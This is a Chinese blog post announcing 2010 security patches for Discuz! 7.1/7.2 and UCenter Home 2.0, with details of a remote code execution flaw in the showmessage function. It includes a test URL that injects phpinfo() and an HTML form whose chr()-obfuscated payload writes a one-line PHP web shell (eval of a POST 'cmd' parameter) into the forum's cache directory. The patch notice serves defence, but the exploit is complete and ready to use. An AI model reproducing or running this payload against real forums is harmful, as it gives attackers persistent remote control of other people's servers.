Lin's Space|Only

两个重要更新补丁包

涉及版本
Discuz! 7.1 , Discuz! 7.2
Discuz! 重要安全补丁 20100110 For Discuz! 7.1 Discuz! 7.2

本补丁包只适用于 UCenter Home 2.0 正式版
UCHome 2.0 正式版 20100106补丁包

从sebug获知，discuz 1.0最近爆出一个跨站漏洞和一个注入漏洞，另外从群里获知dz7.1和7.2存在“php远程执行代码”漏洞（上边的补丁包中已经修复）。uchome在特定php环境配置（register_globals为on）下存在一个注入漏洞。

Discuz! 7.1 & 7.2 远程代码执行漏洞细节
Discuz！新版本7.1与7.2版本中的include目录global.func.php中的showmessage函数内eval执行的参数($scriptlang)未初始化，可以任意提交，从而可以执行任意PHP命令。另外misc.php中showmessage使用的$response没有初始化可以作为一个利用点。

漏洞利用原理
showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。

简单的检测是否漏洞存在
注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

漏洞分析参考：Discuz! 7.1 & 7.2 远程代码执行漏洞

补充HTML测试代码：

<form method=”post” action=”http://bbs.XXXX.com/misc.php” enctype=”multipart/form-data”>
帖子ID，指定一个存在的帖子即可：<input type=”text” name=”tid” value=”1″ />
<input type=”hidden” name=”action” value=”imme_binding” />
<input type=”hidden” name=”response[result]” value=”1:2″ />
<input type=”hidden” name=”scriptlang[1][2]” value=”${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}” />
<input type=”submit” name=”topicsubmit” value=”提交” />
</form>

forumdata/cache/usergroup_01.php cmd 生成的一句话

Discuz, UCHome, 安全补丁

转载原创文章请注明，转载自：Lin's Space|Only[http://clin003.com]

本文链接: http://clin003.com/safe/discuz72-uchome20-20100110-1880/

Google比较注重原创性和时效性，若没有找到需要的内容可尝试以下搜素。